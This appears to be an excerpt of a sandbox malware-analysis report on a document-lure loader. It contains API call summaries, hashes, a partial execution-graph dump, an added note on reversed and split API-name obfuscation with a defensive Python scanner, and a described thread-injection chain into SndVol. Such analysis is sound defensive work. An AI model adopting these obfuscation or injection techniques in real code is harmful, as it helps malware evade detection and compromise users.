                                                                                                                                                  • Instruction Fuzzy Hash: CDF09674E44704AFEB12EFB8DE11DA9B7EDFBCD74075244A0F800C3650DA70AE148964
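The String IDs of the two function summaries above are worth reading literally: AeldnaHeludoMteG is GetModuleHandleA spelled backwards, and RtlM and oveM are the leading fragments of RtlMoveMemory, the ntdll export the same function resolves through GetModuleHandleA/GetProcAddress and then calls at 029B7ED7. Reversing or fragmenting import names is a common way to keep them out of a static string scan while still resolving them at run time. The Python below is an added example written for this page, not Joe Sandbox output and not the sample's code: it scans a memory region for a watch list of API names in plain, reversed and fragment-assembled form. The region it scans is constructed for the example; the trailing emory fragment in it is an assumption, since the report only lists RtlM and oveM.

```python
import re
from typing import Dict, List

# API names worth hunting for in an unpacked region. These are the ones the
# report shows being resolved dynamically; extend the list for other samples.
WATCHED_APIS = [
    "GetModuleHandleA", "GetModuleHandleW", "GetProcAddress",
    "RtlMoveMemory", "IsDebuggerPresent", "GetDiskFreeSpaceExA",
    "VirtualQuery", "LoadStringA",
]

# Constructed sample region (not a dump from the report). It mimics the layout
# the String IDs suggest: a reversed GetModuleHandleA, RtlMoveMemory stored as
# short fragments, and IsDebuggerPresent in the clear. The "emory" fragment is
# assumed; the report only lists "RtlM" and "oveM".
SAMPLE_REGION = (
    b"\x00KernelBASE\x00AeldnaHeludoMteG\x00"
    b"Ntdll\x00RtlM\x00oveM\x00emory\x00"
    b"KernelBase\x00IsDebuggerPresent\x00"
    b"kernel32.dll\x00GetDiskFreeSpaceExA\x00"
)


def extract_strings(buf: bytes, min_len: int = 4) -> List[str]:
    """Return printable-ASCII runs of at least min_len bytes, in buffer order."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(buf)]


def find_obfuscated_apis(buf: bytes, apis: List[str] = WATCHED_APIS,
                         max_parts: int = 4) -> Dict[str, List[str]]:
    """Classify how each watched API name appears in buf.

    Returns {api: [hits]} where a hit is one of:
      'plain'       the name occurs as-is
      'reversed'    the name occurs spelled backwards (AeldnaHeludoMteG)
      'split:a+b'   the name equals the concatenation of 2..max_parts
                    consecutive extracted strings (RtlM+oveM+emory)
    APIs with no hit are omitted.
    """
    strings = extract_strings(buf)
    text = buf.decode("latin-1")  # byte-preserving decode for substring tests
    hits: Dict[str, List[str]] = {}
    for api in apis:
        found: List[str] = []
        if api in text:
            found.append("plain")
        if api[::-1] in text:
            found.append("reversed")
        # Try to rebuild the name from adjacent fragments: keep appending the
        # next extracted string while the partial result is still a prefix.
        for i in range(len(strings)):
            joined = ""
            for j in range(i, min(i + max_parts, len(strings))):
                joined += strings[j]
                if joined == api:
                    if j > i:  # a single string equal to api is 'plain'
                        found.append("split:" + "+".join(strings[i:j + 1]))
                    break
                if not api.startswith(joined):
                    break
        if found:
            hits[api] = found
    return hits


if __name__ == "__main__":
    for name, how in find_obfuscated_apis(SAMPLE_REGION).items():
        print(f"{name:<22} {', '.join(how)}")
```

Running it against a real region from the dump (read the .sdmp into bytes and pass it in) gives the same three classes; the fragment search is deliberately conservative and only joins strings that sit next to each other in memory, which is how Delphi-style short-string constants such as the ones this loader uses end up laid out.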
APIs
• GetModuleHandleW.KERNEL32(KernelBase,?,029BFAEB,UacInitialize,02A27380,029CB7B8,OpenSession,02A27380,029CB7B8,ScanBuffer,02A27380,029CB7B8,ScanString,02A27380,029CB7B8,Initialize), ref: 029BF6EE
• GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 029BF700
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsDebuggerPresent$KernelBase
• API String ID: 1646373207-2367923768
• Opcode ID: 4f816e1e68d19a0d05605ee5b8c3639ca45362206ed527639c82b09fc8bb3fdb
• Instruction ID: b140934d72b0ef1654d3554994b421c1cd1f14db3306eb0f6217fe939774ceb0
• Opcode Fuzzy Hash: 4f816e1e68d19a0d05605ee5b8c3639ca45362206ed527639c82b09fc8bb3fdb
• Instruction Fuzzy Hash: FED012A23603502AFE0176FC2DD4859238C8DE562E3280EA0B022CA8D2E6A68A1A5094
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,029CD10B,00000000,029CD11E), ref: 029AC47A
• GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 029AC48B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 021136061a18b6321c2234e0655b2fd2d21d289411c0ccc2b92847439142a17d
• Instruction ID: c9e671dab9d6894de4df5f3df1db6b5eaf04c15fcc8c9536832052cbd8b91fb2
• Opcode Fuzzy Hash: 021136061a18b6321c2234e0655b2fd2d21d289411c0ccc2b92847439142a17d
• Instruction Fuzzy Hash: AFD09EA1A4C3455AEB00AAB554E563536DC9798314B244826E4469D142E76654108FD8
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029AE297
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029AE2B3
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029AE32A
• VariantClear.OLEAUT32(?), ref: 029AE353
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: ArraySafe$Bound$ClearIndexVariant
• String ID:
• API String ID: 920484758-0
• Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction ID: 009b9e2cbe92bbd02d269fafa6326f818813720109acf858ff7c12fe9e7dcb80
• Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
• Instruction Fuzzy Hash: EB410075A013299FCB62DB58CCA0BC9B3BDAF49314F0045E5E948A7211DA34AF818FA0
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
• GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: a35d5faaa15e9643623e12f70ec0b589991b5379517790a9f8ec26f8094c32c6
• Instruction ID: 83e9f050e297c6163ec1923e4248316d944a7931c3193d9a22bdcb8e6c51c443
• Opcode Fuzzy Hash: a35d5faaa15e9643623e12f70ec0b589991b5379517790a9f8ec26f8094c32c6
• Instruction Fuzzy Hash: D5415A70A403589BDB61DF68CC94BDAB7FDAB48300F0440E6A548E7241DB74AF84CF94
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
• GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                  • Opcode ID: b91cd70b95a841182afdcb21fd5cf5a578c77c9ffc3bdde78122543148cd8598
                                                                                                                                                  • Instruction ID: 2ffd54c9b1333d4faae2fcfcee04bcca097712f70360391c073cddce5a217e46
                                                                                                                                                  • Opcode Fuzzy Hash: b91cd70b95a841182afdcb21fd5cf5a578c77c9ffc3bdde78122543148cd8598
                                                                                                                                                  • Instruction Fuzzy Hash: 04414870A403589FDB61EB68CC94BDAB7FDAB98300F4444E5A548E7241DB74AF88CF94
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ea54a9de0347c6141ed6c7d30e55b2078b589c1b8b173b3420e379a7d080ad19
                                                                                                                                                  • Instruction ID: 57318a01134b5fa09dcc18cfabdf06d67ae7ca91dbff690f67137bdb44a312f7
                                                                                                                                                  • Opcode Fuzzy Hash: ea54a9de0347c6141ed6c7d30e55b2078b589c1b8b173b3420e379a7d080ad19
                                                                                                                                                  • Instruction Fuzzy Hash: B3A1F6667107100BD718AA7C9CA43BDB3DADFC4365F29827EE11DCB381EB68C94686D0
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,029A95DA), ref: 029A9572
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,029A95DA), ref: 029A9578
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                  • String ID: yyyy
                                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                                  • Opcode ID: ae7fa0ca268adbce8c766dd81a2feab530d893e3dd297e7c68701dc7a6a58eb4
                                                                                                                                                  • Instruction ID: 5529e6c113db7fbcf8d3474eb8c9f185640b0e42a34303aad9238baccc6b3744
                                                                                                                                                  • Opcode Fuzzy Hash: ae7fa0ca268adbce8c766dd81a2feab530d893e3dd297e7c68701dc7a6a58eb4
                                                                                                                                                  • Instruction Fuzzy Hash: 8E214B71A043589FEB10DFA8C9A2AAEB3F9FF89700F5114A5EC05E7240D7709E40CAE5
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,029B83C2), ref: 029B83A4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                                                  • String ID: FlushInstructionCache$Kernel32
                                                                                                                                                  • API String ID: 3811539418-184458249
                                                                                                                                                  • Opcode ID: 77e472120d533abd6cceaa3c0b3c38880da307ff52db86eb8ee5b18b4cda39bc
                                                                                                                                                  • Instruction ID: 9ce20ba1c320e0eb6f9b70bb1630756cfd6f885872afadff3ecf126215732264
                                                                                                                                                  • Opcode Fuzzy Hash: 77e472120d533abd6cceaa3c0b3c38880da307ff52db86eb8ee5b18b4cda39bc
                                                                                                                                                  • Instruction Fuzzy Hash: 0F01AD30640304AFEB11EFA8DE61FAAB7EDFB8CB00F515460F900D6240CA70AE108F64
                                                                                                                                                  APIs
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BAF58
                                                                                                                                                  • IsBadWritePtr.KERNEL32(?,00000004), ref: 029BAF88
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000008), ref: 029BAFA7
                                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 029BAFB3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Read$Write
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3448952669-0
                                                                                                                                                  • Opcode ID: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                                  • Instruction ID: 7600598e579623278b54ab0ab17f22bbfcdf9276804421122e7af8ce41b349e2
                                                                                                                                                  • Opcode Fuzzy Hash: 0842f42538510887f6bc99ff4f81f5882a90e14e8419f97fd24a7733c12119fe
                                                                                                                                                  • Instruction Fuzzy Hash: 962184B264071A9BDF11DF6ACD84BEE77B9EF84351F044521FD1497380D734E9118AA4

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:8.4%
                                                                                                                                                  Signature Coverage:1.4%
                                                                                                                                                  Total number of Nodes:369
                                                                                                                                                  Total number of Limit Nodes:50
                                                                                                                                                  execution_graph: raw node/edge dump behind the rendered graph image (not reproduced here). What the dump records:
                                                                                                                                                  • Component starting at 3651cb84: 3651a042 → 3651a182 NtQueryInformationProcess → 3651a2fc NtSuspendThread → 3651a4a6 NtSetContextThread → 3651a4da NtQueueApcThread → 3651a552 NtResumeThread, NtClose. This suspend / set-context / queue-APC / resume walk is the thread-injection chain that the report's "Modifies the context of a thread in another process" and "Queues an APC in another process" signatures fire on.
                                                                                                                                                  • Component starting at 47df110: file, heap and loader housekeeping in the 0x47c0000 region: NtCreateFile, NtReadFile, NtClose, NtAllocateVirtualMemory, RtlAllocateHeap, RtlFreeHeap, LdrInitializeThunk (via stubs at 365d2c0a, 365d2c70, 365d2d10, 365d2d30, 365d2df0, 365d2e80, 365d2ea0, 365d2fb0), LookupPrivilegeValueW and ExitProcess, with sub-graphs the tool collapses to a count (47c87a0: 18 API calls, 47cf710: 9 API calls, 47cf4a0: 2 API calls, 47d4a50: 7 API calls, 47c83a0: 10 API calls, 47c7ea0: 3 API calls).
                                                                                                                                                  The dump is truncated at node 104305 (47dbf60).
RtlAllocateHeap 104304->104305 104306 47d9867 104305->104306 104332 47c9310 104306->104332 104308 47d9882 104309 47d98a9 104308->104309 104310 47d98c0 104308->104310 104311 47dbd90 RtlFreeHeap 104309->104311 104313 47dbd10 NtAllocateVirtualMemory 104310->104313 104312 47d98b6 104311->104312 104312->104282 104314 47d98fa 104313->104314 104315 47dbd10 NtAllocateVirtualMemory 104314->104315 104316 47d9913 104315->104316 104322 47d9bb4 104316->104322 104336 47dbd50 104316->104336 104319 47d9ba0 104320 47dbd90 RtlFreeHeap 104319->104320 104321 47d9baa 104320->104321 104321->104282 104323 47dbd90 RtlFreeHeap 104322->104323 104324 47d9c09 104323->104324 104324->104282 104326 47c829f 104325->104326 104327 47c81b5 104325->104327 104326->104284 104327->104326 104328 47d4a50 7 API calls 104327->104328 104329 47c8222 104328->104329 104330 47dbd90 RtlFreeHeap 104329->104330 104331 47c8249 104329->104331 104330->104331 104331->104284 104333 47c9335 104332->104333 104335 47c938d 104333->104335 104339 47ccf20 104333->104339 104335->104308 104351 47da550 104336->104351 104340 47ccf4c 104339->104340 104341 47ccf6c 104340->104341 104346 47da1f0 104340->104346 104341->104335 104343 47ccf8f 104343->104341 104344 47da460 NtClose 104343->104344 104345 47ccfca 104344->104345 104345->104335 104347 47da20c 104346->104347 104350 365d2ca0 LdrInitializeThunk 104347->104350 104348 47da227 104348->104343 104350->104348 104352 47da567 104351->104352 104355 365d2f90 LdrInitializeThunk 104352->104355 104353 47d9b99 104353->104319 104353->104322 104355->104353 104357 47c8328 104356->104357 104358 47c835c PostThreadMessageW 104357->104358 104359 47c8370 104357->104359 104358->104359 104359->104297 104361 47cf683 104360->104361 104364 47d9e60 104361->104364 104365 47d9e7c 104364->104365 104368 365d2dd0 LdrInitializeThunk 104365->104368 104366 47cf6ae 104366->104297 104368->104366 104369->104244 104371 47d9f93 104370->104371 104374 365d2f30 LdrInitializeThunk 104371->104374 104372 47cf4fe 
104372->104250 104372->104251 104374->104372 104375->104255 104376->104259 104377->104263 104378 365d2ad0 LdrInitializeThunk

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 3651A19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1887785070.0000000036510000.00000040.00000800.00020000.00000000.sdmp, Offset: 36510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36510000_SndVol.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: fec0eebca03a74a6a4f8083be1d61863fdd615d3442dda782298204f744765a6
• Instruction ID: dedc1bea541fd4a304b8ad2a9532a93a80867774e185e78fead36cce2780290c
• Opcode Fuzzy Hash: fec0eebca03a74a6a4f8083be1d61863fdd615d3442dda782298204f744765a6
• Instruction Fuzzy Hash: C2F1FE74918A8C8FEFA5DF68CC94AEEB7E0FB98304F80462AD44AD7250DF349545CB42

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 3651A19F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1887785070.0000000036510000.00000040.00000800.00020000.00000000.sdmp, Offset: 36510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_36510000_SndVol.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 29f8428a6043a370bdf88cc7413e4075fbc2fc9e35de9703a45c16405ba27d7d
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: A651FD70918A8C8FEB65EF68C8946EEBBF4FB98305F40462ED44AD7250DF349645CB41

Control-flow Graph

control_flow_graph 431 47da48a-47da48b 432 47da48d-47da4a6 431->432 433 47da420-47da429 NtReadFile 431->433 434 47da4ac-47da4cd 432->434 435 47da4a7 call 47daf30 432->435 435->434
APIs
• NtReadFile.NTDLL(047D4D72,5EB65239,FFFFFFFF,047D4A31,?,?,047D4D72,?,047D4A31,FFFFFFFF,5EB65239,047D4D72,?,00000000), ref: 047DA425
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 0382515b3e4abf3c69fe422e606231a13454352e31f54acbd335727d85a5a1f5
• Instruction ID: 7edbe3010ce117a75bf5d4d997f23b2de1302d2af7a3408e9c25f04be3354938
• Opcode Fuzzy Hash: 0382515b3e4abf3c69fe422e606231a13454352e31f54acbd335727d85a5a1f5
• Instruction Fuzzy Hash: 7AF0F4B6210218AFDB14DF99DC44EA773ADEF8C254F118559FA4C97241C630E8518BA0

Control-flow Graph

control_flow_graph 437 47da330-47da381 call 47daf30 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,047C9CF3,?,047D4BB7,047C9CF3,FFFFFFFF,?,?,FFFFFFFF,047C9CF3,047D4BB7,?,047C9CF3,00000060,00000000,00000000), ref: 047DA37D
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: d58d62b2f2b39385acfc1d46379b3c0a9fe132078d9c514ba64df3db0ade966e
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: D4F0BDB2211208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630F8118BA4

Control-flow Graph

control_flow_graph 440 47da3e0-47da429 call 47daf30 NtReadFile
APIs
• NtReadFile.NTDLL(047D4D72,5EB65239,FFFFFFFF,047D4A31,?,?,047D4D72,?,047D4A31,FFFFFFFF,5EB65239,047D4D72,?,00000000), ref: 047DA425
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: cd859897e374856b73151f9f1c6ebe5ab5fb7ef40d209bf234199f2c177a35cd
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 90F0A4B2210208ABDB18DF89DC84EEB77ADEF8C754F158249BA1D97241D630E8118BA0

Control-flow Graph

control_flow_graph 457 47da510-47da54d call 47daf30 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,047DB104,?,00000000,?,00003000,00000040,00000000,00000000,047C9CF3), ref: 047DA549
Memory Dump Source
• Source File: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 047C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_47c0000_SndVol.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 80bc994715c8a7d803723105c4985c6a335b58563eb619fab0ba0143157aeb5d
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: 7EF015B2210208ABDB18DF89CC80EAB77ADEF88654F118149FE0897241C630F811CBA0
